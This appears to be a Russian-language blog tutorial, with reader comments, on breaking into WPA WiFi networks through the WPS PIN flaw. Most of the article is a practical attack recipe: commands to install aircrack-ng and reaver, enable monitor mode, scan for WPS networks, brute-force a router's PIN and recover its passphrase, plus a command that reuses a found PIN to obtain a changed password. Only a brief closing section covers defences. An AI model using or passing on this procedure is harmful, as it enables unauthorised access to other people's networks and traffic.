Если информация была полезной для вас, вы можете поблагодарить за труды Юmoney: 41001164449086

Взлом WiFi WPA бесплатно

Скажу сразу, всё написанное далее будет иметь практический характер. Все утилиты для взлома - бесплатны и находятся в свободном доступе.
Написать статью меня прежде всего побудило бесчисленное число сайтов которые якобы предлагают программы для взлома которые на практике оказываются платными, с вирусами и троянами, либо и то и другое одновременно. В сети огромное число статей и видео постановочного характера, мол мы взломали WiFi за 3 сек. - вот как всё просто, хотя на самом деле пароль был известен заранее и прописан в базу словарей. Итак, переходим к сути.

В начале несколько слов о возможных режимах работы безопасности WiFi.

Очень упрощённо можно выделить следующие:

  • Open – передаваемые данные не шифруются, пароль для подключения не требуется, ломать ничего не надо. Выбираем сеть и подключаемся.
  • WEP — данные шифруются 64 либо 128 битным ключом, который необходимо знать для подключения. Из-за ошибок в стандарте и малой длине ключа на данный момент устарел и практически не используется.
  • WPA(WPA2)- PSKсовременный стандарт. Для подключения необходимо знать пароль минимальная длина которого 8-мь символов. Взломать можно исключительно перебором пароля, что требует огромной вычислительной мощности. На практике взлом возможен средствами CUDA, при длине пароля менее 10-ти символов, о чём мною было написано ранее в статье - Взлом WiFi WPA, WPA2, практика, правда и вымысел.
  • WPA-WPS — вот тут начинается самое интересное...

Для обычного WPA(WPA2) - PSK необходимо настроить точку доступа или маршрутизатор в ручную, задав ей пароль и прописав некоторые параметры безопасности. Даже казалось бы такая простая операция у многих далёких от компьютера людей вызывает массу сложностей. Кроме этого пароль надо запомнить, а это как минимум 8-мь символов!
Сарказм? Отчасти да, но на самом деле через пол года когда вдруг потребуется подключить ещё одно устройство вспомнить пароль не так уж и просто.
Именно для этого было создано новое расширение - WPA-WPS, призванное упростить процедуру настройки соединения WiFi. При работе WPA-WPS нет необходимости в ручную прописывать параметры безопасности, и хотя при этом для передачи данных по прежнему используется пароль (как правило генерируемый случайным образом), знать его для соединения вовсе не обязательно.
Если устройства поддерживают WPS, то для того чтоб подключиться к сети достаточно найти её в списке доступных, выбрать её.


Рис.1 Подключение к WiFi в Windows 7 по WPS.

 

После чего нажать на кнопку WPS на точке доступа или маршрутизаторе.


Рис.2 Кнопка WPS на маршрутизаторе Dlink DIR-320.

 

Соединение установлено, при этом никакого пароля ни помнить ни вводить не надо. Казалось бы всё замечательно но не совсем.
В процессе начального соединения используется PIN код, состоящий из 8-ми десятичных символов.


Рис.3 Страница настроек WPS маршрутизатора Dlink DSL-2750.

Зная этот пин код можно без труда подключиться к сети. В зависимости от устройства он может быть зашит без возможности изменения, либо с возможностью. Но это не отменяет главной проблемы - он всегда состоит только из цифр длиной 8-мь символов, а это значит его можно найти путём банального перебора 108 - 100 000 000 комбинаций, что не так уж и много. Не вдаваясь в подробности,скажу, что ошибка в стандарте позволила сократить число возможных вариантов до 11 000, ещё больше упростив задачу. Зная этот пин код можно установить начальное соединение после чего выяснить пароль с помощью которого уже полностью подключиться к сети, без необходимости нажимать кнопку. Важно отметить, что для перебора PIN кода необходимо иметь постоянное соединение с взламываемой WiFi сетью.

На этом теории более чем достаточно, переходим к практике. Для этого потребуется компьютер с WiFi и Linux'ом на борту.

WiFi адаптер — внешний USB TP-LINK TL-WN722NC, о котором я писал в статье - Взлом WiFi, подходящее железо.
Его просто купить, стоит он дёшево, имеет хорошую чувствительность за счёт внешней антенны, которую к слову можно поменять. А главное он хорошо поддерживается со стороны множества дистрибутивов и необходимого софта.
В моём случае я использую дистрибутив Mageia 4, хотя подойдёт практически любой, включая специализированные вроде BackTrack, в котором все необходимые утилиты присутствуют изначально.

Будем считать что необходимые драйвера установлены и перед нами консоль.
Убедимся что у нас присутствует необходимая обвязка для работы с сетью:

[root@localhost ]# urpmi wireless-tools

Отступление: в Mageia команда для установки пакета — urpmi, если вы используете другой дистрибутив возможно вам потребуется изменить её на apt-get install или yum install.

Теперь проверим что наш беспроводной адаптер работает:

[root@localhost ]# iwconfig
enp0s3 no wireless extensions.

lo no wireless extensions.

wlp0s6u2 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlp0s6u2 имя WiFi адаптера. В вашем случае оно скорее всего будет другим.

Займёмся установкой необходимого софта. Первое что нам потребуется это aircrack-ng.

[root@localhost ]# urpmi aircrack-ng

 

Также нам понадобится reaver-wps.

К сожалению в моём дистрибутиве этой программы не оказалось и мне пришлось компилировать её из исходников. Последнюю версию можно найти по адресу:
http://code.google.com/p/reaver-wps/downloads/list

На момент написания статьи последняя версия -1.4.

Скачаем её:

[root@localhost ]# wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

 

Также для её установки в моём случае потребовались дополнительные пакеты:

[root@localhost src]# urpmi libpcap libpcap-devel sqlite3-devel

Возможно вам потребуется что-то ещё, но это зависит сугубо от системы.

После того как все необходимые подготовительные действия произведены продолжим установку reaver-wps в систему:

[root@localhost ]# tar xvzf reaver-1.4.tar.gz
[root@localhost ]# cd reaver-1.4/src
[root@localhost src]# ./configure
[root@localhost src]# make
[root@localhost src]# make install

 

Для работы reaver необходимо перевести WiFi адаптер в режим монитора, с помощью утилиты airmon-ng которая входит в состав установленного ранее aircrack-ng.

[root@localhost ]# airmon-ng start wlp0s6u2

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!


PID Name
837 ifplugd
1086 dhclient

Interface Chipset Driver

wlp0s6u2 Atheros ath9k - [phy0]
(monitor mode enabled on mon0)

 

Теперь у нас в системе появился новый виртуальный адаптер mon0 который работает в режиме монитора. При этом он связан с физическим wlp0s6u2.
Для того чтобы система не мешала нам работать с WiFi адаптером «опустим» физический интерфейс:

[root@localhost src]# ifconfig wlp0s6u2 down

Всё, теперь можно заняться непосредственно взломом:

[root@localhost src]# wash -i mon0

 
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
F8:*A:*7:*D:6A:*8 1 -93 1.0 Yes c***********g
F*:F5:2*:61:*1:58 1 -78 1.0 No d************t
84:C*:B2:*D:C2:1C 9 -69 1.0 No d*******k

 

 

wash - это утилита входящая в состав reaver-wps которая сканирует и выводит на экран все WiFi сети которые поддерживают WPS. Дабы не нарушать закон символом «*» заменены MAС адреса (BSSID) точек доступа а также имена сетей которые подвержены взлому. Помимо прочей информации wash выводит уровень сигнала а также канал на котором работает маршрутизатор или точка доступа.

Разумеется дабы не нарушать закон я буду взламывать свою собственную WiFi сеть.
В качестве параметров для reaver необходимо задать MAС адрес (BSSID) интересующей сети, а также чтобы ускорить процесс первоначального соединения можно явным образом указать номер канала искомой сети WiFi.

Запустим утилиту перебора PIN кода:

[root@localhost src]# reaver -i mon0 -c 9 -b 84:C*:B2:*D:C2:1C

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.>

[+] Waiting for beacon from 84:C*:B2:*D:C2:1C
[+] Associated with 84:84:C*:B2:*D:C2:1C (ESSID: d*******k)
[+] 0.05% complete @ 2014-10-17 23:18:49 (3 seconds/pin)
[+] 0.10% complete @ 2014-10-17 23:19:06 (3 seconds/pin)

 

Спустя 5-ть часов reaver выдал:

[+] WPS PIN: '**17*5**'
[+] WPA PSK: 'c*********7'
[+] AP SSID: 'd*******k'

 

Опять таки символом * заменена часть информации:

WPS PIN — найденный пин код.
WPA PSK — пароль для соединения с WiFi.
AP SSID — имя сети.

При этом следует отметить что зная пароль можно свободно подключиться к сети без необходимости физически иметь доступ к маршрутизатору чтоб нажать кнопку WPS!

В самом начале я говорил о том что некоторые устройства не позволяют менять PIN код, как это например в моём случае. Один раз найдя PIN код можно свободно узнать пароль, даже если владелец сети поменяет его в ручную, выполнив команду:

[root@localhost src]# reaver -i mon0 -c 9 -b 84:C*:B2:*D:C2:1C -p **17*5**

 

В ответ утилита выдаст вам новый пароль.

Какие существуют способы решения проблемы?
Некоторые производители обновили прошивку своих устройств введя так называемый тайм аут.
При определённом числе неправильно введёных PIN кодов точка доступа перестаёт принимать попытки соединения по WPS на некоторое время. Это значительно увеличивает время перебора пин кода, но не решает проблему целиком.

Для того чтобы быть полностью уверенным что PIN код не подберут необходимо отключать WPS полностью.


Рис.4 Отключение WPS в маршрутизаторе Dlink DSL-2750.

 

К сожалению не все устройства позволяют сделать и это. В таком случае как правило остаётся только замена оборудования.

В статье затронута лишь малая часть безопасности беспроводных WiFi сетей, в реальности существуют также множество других методов и подходов для взлома.
Если вас интересует провести аудит существующей сети, или вам необходимо организовать новую действительно защищённую WiFi сеть — оставляйте комментарии, пишите через раздел контакты.
Помните, информационная безопасность на сегодняшний день крайне важна и лучше доверить её тому, кто занимается этим уже много лет, то есть мне (смайл).

Хочу отметить, что реальный взлом противозаконен! Статья написана исключительно в ознакомительных целях с целью защиты от взлома. Автор не несёт никакой ответственности за возможные противоправные действия.

Комментарии   

# Alex 21.02.2015 10:25
можно скачать лишь 3 проги,доступны в инете,WinPcap,D umpper и Jumpstart и подключаться к доступным wifi без заморочек,в течение 5 мин максимум.
Ответить | Ответить с цитатой | Цитировать
# maxim_bo 16.03.2015 12:22
У меня из 30 точек найденных, данная связка не сработала ни на одной! Все пины которые она показывает - левые...
Ответить | Ответить с цитатой | Цитировать
# admin 21.02.2015 16:50
Перепробовал на нескольких системах с разными WiFi сетями. Результат один и тот-же. Dumpper показывает всё что угодно но только не настоящий PIN, как следствие вся связка просто не работает.
Только зря потратил время.
Ответить | Ответить с цитатой | Цитировать

Добавить комментарий


Если информация была полезной для вас, вы можете поблагодарить за труды Юmoney: 41001164449086